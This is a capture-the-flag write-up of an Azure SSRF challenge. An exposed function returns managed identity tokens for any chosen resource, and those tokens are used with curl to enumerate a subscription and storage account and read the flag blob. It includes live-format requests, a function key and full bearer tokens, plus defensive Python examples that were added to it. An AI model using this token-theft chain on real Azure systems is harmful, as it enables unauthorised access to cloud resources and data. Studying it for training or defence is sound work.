
# Flag 7

<figure><img src="/files/dXwUQB0R1DPjaygLFsWV" alt=""><figcaption></figcaption></figure>

The `Deployer App` error message suggested that we must include a query string parameter of `Endpoint`.

Using Postman, I made it visit a requestbin endpoint, but was greeted with a new error message:

<figure><img src="/files/ZzQflpoJhmPZH9D6iLXl" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```json
{"statusCode":500,"message":"An unexpected error occured while fetching the AAD Token.","correlationId":"d64206c2-b852-4bbd-9938-672ee908b3d6"}
```

{% endcode %}

It shows an error fetching an AAD Token, which reminds me of a Cloud SSRF Attack.

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf>" %}

Referring to HackTricks, I set `Endpoint=https://management.azure.com` and was able to retrieve a bearer token.

Request

{% code overflow="wrap" %}

```bash
curl --location 'https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw%3D%3D&Endpoint=https%3A%2F%2Fmanagement.azure.com'
```

{% endcode %}

Response

{% code overflow="wrap" %}

```json
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.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.L3CVBYSqNH1TO4YweUhNDnxFkF3K_mXcS1NEmQkMlPH1CKoy0mKY83bgg9G4ajZvts4hckI8KUU9mT3Fs-i8lPtlismbgkJdW_ZBgFexAA_0FRtJTXWerwe4x69Zr6Yw8FNNPii0YK-h1intntm-D96XSOri21DrCztoyLOaxTPMTt0jk-Oy491ohIYI36j6A2d_EQOXygrLc-7AzjM6ooAftsYqzLhUjKq3xAG1OAo5bT_ewYqmZKH8ZXTzsn27zwdbpfv86BrVevb6vZ5FlDuF9DG5jI-Iu1OO_U9SnKb3riprZTbq4EDXD_AWnXFli_WBsWWtYpa_FF24hgcK1w","expires_on":"03/27/2023 13:31:01 +00:00","resource":"https://management.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"}
```

{% endcode %}
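The behaviour above (a token for whatever resource the caller names, returned in the response body) next to a hardened form, as an added example that is not the challenge's or the author's code. The handler shape, `ALLOWED_RESOURCES`, `get_token` and `deploy` are assumptions made for illustration; the token and deploy functions are constructed stand-ins so the block runs offline.

```python
from urllib.parse import urlsplit

# Assumption: the one resource this function legitimately needs a token for.
ALLOWED_RESOURCES = {"https://management.azure.com"}


def vulnerable_handler(params, get_token):
    """Behaviour seen in the write-up: a token for the caller-chosen resource is echoed back."""
    resource = params.get("Endpoint")
    if not resource:
        return 400, {"message": "Endpoint is required"}
    return 200, get_token(resource)  # access_token leaves the trust boundary


def normalize_resource(raw):
    """Return a canonical https://host string, or None unless raw is a bare https origin."""
    try:
        parts = urlsplit(raw)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme != "https" or not parts.hostname:
        return None
    if parts.username or parts.password or port not in (None, 443):
        return None
    if parts.path not in ("", "/") or parts.query or parts.fragment:
        return None
    return "https://" + parts.hostname.lower()


def hardened_handler(params, get_token, deploy):
    """Allowlist the resource, use the token server-side, return only the outcome."""
    resource = normalize_resource(params.get("Endpoint", ""))
    if resource not in ALLOWED_RESOURCES:
        return 400, {"message": "Endpoint not permitted"}
    token = get_token(resource)
    outcome = deploy(resource, token["access_token"])  # token never reaches the caller
    return 200, {"status": outcome}


def fake_get_token(resource):
    """Constructed stand-in for the managed identity token request; runs offline."""
    return {"access_token": "constructed-token", "resource": resource, "token_type": "Bearer"}


def fake_deploy(resource, bearer):
    """Constructed stand-in for the function's real work."""
    return "deployed"
```

The allowlist only limits which audiences can be minted; the role assignments on the managed identity still decide what any issued token can reach.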

Referring to the [Azure Documentation](https://learn.microsoft.com/en-us/rest/api/resources/resources/list) and this [GitHub URL](https://raw.githubusercontent.com/PacktPublishing/Penetration-Testing-Azure-for-Ethical-Hackers/main/chapter-5/tokenexploit.sh), I used Postman to perform further enumeration of the permissions.

{% embed url="<https://learn.microsoft.com/en-us/rest/api/resources/resources/list>" %}

I first retrieved the subscription ID by requesting `https://management.azure.com/subscriptions?api-version=2020-01-01`

Request

```bash
curl --location 'https://management.azure.com/subscriptions?api-version=2020-01-01' \
--header "Authorization: Bearer ${token}" \
--header 'x-ms-version: 2017-11-09'
```

Response

```json
{
    "value": [
        {
            "id": "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb",
            "authorizationSource": "RoleBased",
            "managedByTenants": [],
            "subscriptionId": "7b9bd916-8bd2-4446-9678-8531ef663edb",
            "tenantId": "5f487283-b88e-4ade-8035-7bcaac4156b3",
            "displayName": "dartsub",
            "state": "Enabled",
            "subscriptionPolicies": {
                "locationPlacementId": "Public_2014-09-01",
                "quotaId": "PayAsYouGo_2014-09-01",
                "spendingLimit": "Off"
            }
        }
    ],
    "count": {
        "type": "Total",
        "value": 1
    }
}
```

Then I attempted to retrieve a list of resources that the current user has access to.

Request

{% code overflow="wrap" %}

```bash
curl --location 'https://management.azure.com/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resources?api-version=2019-10-01' \
--header "Authorization: Bearer ${token}" \
--header 'x-ms-version: 2017-11-09'
```

{% endcode %}

Response

```json5
{
    "value": [
        {
            "id": "/subscriptions/7b9bd916-8bd2-4446-9678-8531ef663edb/resourceGroups/DARTMission/providers/Microsoft.Storage/storageAccounts/coresat",
            "name": "coresat",
            "type": "Microsoft.Storage/storageAccounts",
            "sku": {
                "name": "Standard_LRS",
                "tier": "Standard"
            },
            "kind": "StorageV2",
            "location": "eastus",
            "tags": {}
        }
    ]
}
```

I identified that the user has access to a storage account named `coresat`. To perform further enumeration on the storage account, I will need to request a `storage account` bearer token, keeping in mind that the current bearer token is for `management`.

Request

{% code overflow="wrap" %}

```bash
curl --location 'https://rosarray.azurewebsites.net/api/Deployer?code=li1u2C-xrQ_xvUA5d18DUKcniUSAAd4NY_tS3KmsnTYGAzFuoYq5vw==&Endpoint=https://storage.azure.com'
```

{% endcode %}

Response

{% code overflow="wrap" %}

```json
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL3N0b3JhZ2UuYXp1cmUuY29tIiwiaXNzIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvNWY0ODcyODMtYjg4ZS00YWRlLTgwMzUtN2JjYWFjNDE1NmIzLyIsImlhdCI6MTY3OTgzNzMzNSwibmJmIjoxNjc5ODM3MzM1LCJleHAiOjE2Nzk5MjQwMzUsImFpbyI6IkUyWmdZSGdjUHBzLzRmaWxTd0t5Q1ZzK1Q3Z2ZDd0E9IiwiYXBwaWQiOiI5ZjI0OGEzYy1mMTE2LTQ4NjUtYTFiZS00OGZmZDAzMDQ5MzciLCJhcHBpZGFjciI6IjIiLCJpZHAiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC81ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMvIiwib2lkIjoiNWQwNGNjNGEtYzY3ZC00NmY4LWE0NTYtMmNkMzE1NzQ3YmJhIiwicmgiOiIwLkFYd0FnM0pJWDQ2NDNrcUFOWHZLckVGV3M0R21CdVRVODZoQ2tMYkNzQ2xKZXZHN0FBQS4iLCJzdWIiOiI1ZDA0Y2M0YS1jNjdkLTQ2ZjgtYTQ1Ni0yY2QzMTU3NDdiYmEiLCJ0aWQiOiI1ZjQ4NzI4My1iODhlLTRhZGUtODAzNS03YmNhYWM0MTU2YjMiLCJ1dGkiOiJWNUNYeHhBMWFVS1huZ1VSdG1na0FRIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvN2I5YmQ5MTYtOGJkMi00NDQ2LTk2NzgtODUzMWVmNjYzZWRiL3Jlc291cmNlZ3JvdXBzL0RBUlRNaXNzaW9uL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL1JPU0FycmF5In0.KDEdC4IihcUOMWIpdgg1kZy3DtJirpirE1yL91Hc90YebkP_6tUcq-2zzSqo470AFyuAeht5hTsYgGClQj8xJPsAZckZG8SUWPBSCSoBXeP-29stnEhSkM6XOUf_wbPEtxM7IDgGaK9MboufCm5y4_un1_dg3BCqqacaQLBtBUoTiPG5Nfu1uBnK_Duy8g_e2XDLOSjaBUZIB4T1-mVlN6PnQciTHmhKGJdz1Mf-dL7yz8YCg0Yfzr7Iao6wel5XuIceT9TU7jQrgsXAKYkHU_zF5ETJG45IGm4KV_xCQCZg-SGfSbu1SGwqIJtS5rj6pplmwfqRZvC_eGwo3pENAA","expires_on":"03/27/2023 13:33:55 +00:00","resource":"https://storage.azure.com","token_type":"Bearer","client_id":"9f248a3c-f116-4865-a1be-48ffd0304937"}
```

{% endcode %}
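Why a second token was needed: each token carries an `aud` claim naming the one resource it is valid for, so the management token is not accepted by blob storage. The added example below (not from the original write-up) decodes a token's claims for triage; the host-to-audience mapping is a simplified assumption and the sample token and its claim values are constructed placeholders.

```python
import base64
import json


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_sample_token(claims):
    """Build a constructed, unsigned JWT-shaped string so the example runs offline."""
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{b64url(json.dumps(claims).encode())}.constructed"


def decode_claims(token):
    """Decode the payload segment without verifying the signature (inspection only)."""
    segments = token.split(".")
    if len(segments) != 3:
        raise ValueError("not a three-part JWT")
    payload = segments[1] + "=" * (-len(segments[1]) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload))


def expected_audience(host):
    """Simplified assumption: the audience each API host in the write-up expects."""
    if host == "management.azure.com":
        return "https://management.azure.com"
    if host.endswith(".blob.core.windows.net"):
        return "https://storage.azure.com"
    return None


def triage(token, host, now):
    """Summarise a leaked token: which identity, whether host accepts it, seconds left."""
    c = decode_claims(token)
    return {
        "identity": c.get("xms_mirid"),  # resource ID of the managed identity's owner
        "audience_ok": c.get("aud", "").rstrip("/") == expected_audience(host),
        "seconds_left": max(0, c.get("exp", 0) - now),
    }


# Constructed claims shaped like a managed identity token; every value is a placeholder.
MIRID = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourcegroups/"
         "example-rg/providers/Microsoft.Web/sites/example-func")
ARM_TOKEN = make_sample_token(
    {"aud": "https://management.azure.com", "exp": 2000, "xms_mirid": MIRID})
```

During incident response, `identity` and `seconds_left` tell you which identity's role assignments to review and how long the leaked token remains usable.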

Next I refer to this [documentation](https://learn.microsoft.com/en-us/rest/api/storageservices/) to further enumerate the storage account.

{% embed url="<https://learn.microsoft.com/en-us/rest/api/storageservices/>" %}

Request

```bash
curl --location 'https://coresat.blob.core.windows.net/?comp=list' \
--header "Authorization: Bearer ${token}" \
--header 'x-ms-version: 2017-11-09'
```

Response

```xml
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://coresat.blob.core.windows.net/">
    <Containers>
        <Container>
            <Name>datahandling</Name>
            <Properties>
                <Last-Modified>Wed, 15 Mar 2023 14:38:57 GMT</Last-Modified>
                <Etag>"0x8DB256302872266"</Etag>
                <LeaseStatus>unlocked</LeaseStatus>
                <LeaseState>available</LeaseState>
                <HasImmutabilityPolicy>false</HasImmutabilityPolicy>
                <HasLegalHold>false</HasLegalHold>
            </Properties>
        </Container>
    </Containers>
    <NextMarker />
</EnumerationResults>
```

Now that we have the container name `datahandling`, we can enumerate the blobs within the container, referring to this [article](https://learn.microsoft.com/en-us/rest/api/storageservices/list-blobs?tabs=azure-ad).

{% embed url="<https://learn.microsoft.com/en-us/rest/api/storageservices/list-blobs?tabs=azure-ad>" %}

Request

{% code overflow="wrap" %}

```bash
curl --location 'https://coresat.blob.core.windows.net/datahandling?restype=container&comp=list' \
--header "Authorization: Bearer ${token}" \
--header 'x-ms-version: 2017-11-09'
```

{% endcode %}

Response

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://coresat.blob.core.windows.net/" ContainerName="datahandling">
    <Blobs>
        <Blob>
            <Name>Flag7.txt</Name>
            <Properties>
                <Creation-Time>Fri, 17 Mar 2023 09:51:14 GMT</Creation-Time>
                <Last-Modified>Fri, 17 Mar 2023 09:51:14 GMT</Last-Modified>
                <Etag>0x8DB26CD25E0F3A3</Etag>
                <Content-Length>47</Content-Length>
                <Content-Type>text/plain</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>d1UOmf3KFXonNzNJvZB+5Q==</Content-MD5>
                <Cache-Control />
                <Content-Disposition />
                <BlobType>BlockBlob</BlobType>
                <AccessTier>Hot</AccessTier>
                <AccessTierInferred>true</AccessTierInferred>
                <LeaseStatus>unlocked</LeaseStatus>
                <LeaseState>available</LeaseState>
                <ServerEncrypted>true</ServerEncrypted>
            </Properties>
        </Blob>
        <Blob>
            <Name>LORRI-Cert.txt</Name>
            <Properties>
                <Creation-Time>Wed, 15 Mar 2023 14:39:51 GMT</Creation-Time>
                <Last-Modified>Wed, 15 Mar 2023 14:39:51 GMT</Last-Modified>
                <Etag>0x8DB256322B11B97</Etag>
                <Content-Length>6998</Content-Length>
                <Content-Type>application/octet-stream</Content-Type>
                <Content-Encoding />
                <Content-Language />
                <Content-MD5>19wxEVC9dZDYVVICu9JmtQ==</Content-MD5>
                <Cache-Control />
                <Content-Disposition />
                <BlobType>BlockBlob</BlobType>
                <AccessTier>Hot</AccessTier>
                <AccessTierInferred>true</AccessTierInferred>
                <LeaseStatus>unlocked</LeaseStatus>
                <LeaseState>available</LeaseState>
                <ServerEncrypted>true</ServerEncrypted>
            </Properties>
        </Blob>
    </Blobs>
    <NextMarker />
</EnumerationResults>
```

{% endcode %}

There are 2 blobs in the container, namely `Flag7.txt` and `LORRI-Cert.txt`.

Retrieving `Flag7.txt` gives me the flag.

Request

```bash
curl --location 'https://coresat.blob.core.windows.net/datahandling/Flag7.txt' \
--header "Authorization: Bearer ${token}" \
--header 'x-ms-version: 2017-11-09'
```

Response

```text
Flag 7 : All systems are functioning normally.
```

Flag 7 : All systems are functioning normally.


